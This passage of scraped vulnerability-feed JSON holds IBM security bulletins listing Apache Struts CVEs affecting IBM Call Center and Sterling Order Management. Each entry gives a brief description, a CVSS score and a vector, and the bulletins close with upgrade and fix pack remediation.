a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Call Center for Commerce| 9.5.0 \nIBM Call Center for Commerce| 10.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. IBM Call Center version 9.5 reached end of support April 30, 2022.\n\nCall Center installing Fix Pack 12 - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-installing-fix-packs>\n\nFix Pack 12 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&amp;product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&amp;source=dbluesearch&amp;mhsrc=ibmsearch_a&amp;mhq=10.0.0.0-Sterling&amp;function=fixId&amp;parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software>)\n\nIBM Call Center release notes - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-fixes-by-fix-pack-version#fp12>\n\nCreating &amp; Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\n## Workarounds and Mitigations\n\nBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. IBM Call Center version 9.5 reached end of support April 30, 2022.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T17:37:56", "type": "ibm", "title": "Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "modified": "2022-09-14T17:37:56", "id": "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "href": "https://www.ibm.com/support/pages/node/6620351", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:58:38", "description": "## Summary\n\nApache Struts is used by IBM Sterling Order Management as part of its web application framework used for creating Java EE web applications . We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 29.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ 